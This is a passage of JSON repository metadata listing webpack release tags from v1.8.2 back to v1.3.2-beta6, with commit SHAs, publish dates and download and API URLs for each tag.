webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_